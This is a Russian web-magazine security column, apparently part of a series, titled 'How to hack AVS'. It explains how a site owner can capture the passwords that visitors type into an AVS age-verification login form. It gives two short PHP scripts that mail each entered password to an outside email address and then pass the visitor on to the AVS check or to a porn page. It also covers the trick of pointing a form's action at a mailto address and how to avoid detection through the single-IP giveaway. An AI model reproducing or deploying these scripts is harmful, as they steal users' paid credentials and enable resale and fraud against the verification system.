Еженедельник Свет в Интернет

Главная

Новости

Статьи и обзоры
  Горожанин
  Обнинск в Internet
  Web Design
  Hardware
  Software
  Безопасность
  Серфинг
  Игродром
  Relax
  Технологии
  Web-обзор
  Интернет-ликбез
  Опросник
  УП-Технологии
  ART.net

Ссылки

Архив

О нас

Контакты

Форумы


Основатель:
К.Николаенко

Главный Редактор:
С.Коротков

Web Design:
Neutron


Наш спонсор






Порт POPULAR.RU
POPULAR.RU RegionalBanner Network.






Океан


НПП Метра - промышленные электронные автомобильные вагонные весы
Goldy Interior - салон офисной мебели: кабинеты руководителей, мебель для персонала

= Безопасность =

КАК ВЗЛОМАТЬ AVS

Сергей Коротков korotko-f@mail.ru
по материалам www.iworld.ru
продолжение: начало в #9(121)

Рядовой веб-мастер будет огорочен, если пользователь, зашедший на его сайт, никогда больше не появится вновь, сочтя содержание неинтересным. Но это совсем не огорчает хакера, так как одного-единственного предъявления пароля вполне достаточно для того, чтобы он был скопирован и перестал являться секретным словом. Пароли эти, кстати, покупаются за достаточно значительные суммы: к примеру, стоимость паролей доступа к сайтам, защищенным AVS CyberAge, составляет от $19.95 до $65.95. Похищенные пароли затем перепродаются или используются для накрутки той же системы AVS, выплачивающей веб-мастерам проценты с купленных посетителями паролей. На этом описательную часть взлома можно считать завершенной и приступить к рассмотрению его программной реализации.
Переход на страницу для ввода пароля, как правило, осуществляется сразу с титульной страницы сайта. Попадая на нее, пользователь видит форму для ввода пароля и кнопку, нажатие которой отправляет введенный пароль на проверку. Фрагмент HTML-кода, взятый из такой формы, может выглядеть так:

<form name="Enter_ID"
action="http://chick.avsofchoice.com/checkid"
method="post">
<input type="hidden" name="page" value="2199076">
<input type="text"> name="id" size="18">
<input type="submit" name="submitButtonName" value="Enter">
</form>

После нажатия кнопки происходит переход на указанную ссылку с передачей набора параметров. В данном случае этот набор можно явно наблюдать в полях <input>, но если их оказывается слишком много, полезно бывает заменить атрибут action тега <form> на что-нибудь вроде "mailto:your@email..com", после чего используемые параметры отправятся на указанный почтовый адрес. Вводим вместо пароля, например, pas123 и видим, что в результате была получена строка page=2199076&id=pas123&submitButtonName=Enter. Именно она, содержащая пароль (поле id) максимальной длины - 18 символов - и невидимый пользователю номер сайта (поле page с типом type="hidden"), значение которого в данном случае равно 2199076, и отправляется на проверку. Полный вид строки, которую можно вызвать прямо из браузера, таков:
"http://chkid.avsofchoice.com/checkid?page=2199076&id=pas123&submitButtonName=Enter".

Текст, переданный формой, обрабатывается на стороне сервера специальным модулем, написанным на каком-либо из языков программирования (Perl, PHP и т.п.). Именно на этом этапе в процесс вмешивается хакер - он подставляет в качестве такого модуля свой собственный скрипт.
Рассмотрим два максимально коротких скрипта, написанных РНР и осуществляющих перехват пароля и пересылку его на требуемый e-mail.

Вариант 1.

<?php

mail(`aiv@aiv.spb.ru`, "$id", "PASSWORD-> $id");

readfile("http://chkid.avsofchoice.com/checkid?page="+
$page+&id="+$id+"&submitButtonName=Enter");

?> 

Вариант 2.

<?php

mail(`aiv@aiv.spb.ru`, "$id", "PASSWORD-> $id");

readfile("http://youtpornosite.com/main.html");

?>

Представленные варианты кода реализуют схемы, показанные на рис. (см. начало в #9(121). В первом варианте после перехвата пароля вызывается непосредственно процедура проверки AVS-системы. Использование этого варианта имеет досадный недостаток - все пользователи, проходящие через систему контроля AVS, будут попадать на нее с компьютера, имеющего один и тот же IP-адрес, то есть с того сервера, на котором хакер разместил скрипт. Согласитесь, очень странно, когда все посетители приходят с одного адреса (впрочем, этот недостаток легко устраняется, если вместо непосредственного скачивания страницы аутентификации AVS-системы использовать перенаправление на нее). Второй вариант лишен этого недостатка, так как сайт просто выпадает из системы проверки AVS, а пользователь, потеряв пароль, сразу попадает на страницу с желанными картинками, указанную в третьей строке, - в нашем примере это http://yourpornosite.com/main.html.

Продолжение следует.

Copyright © Свет в Internet   Designed by Свет в Internet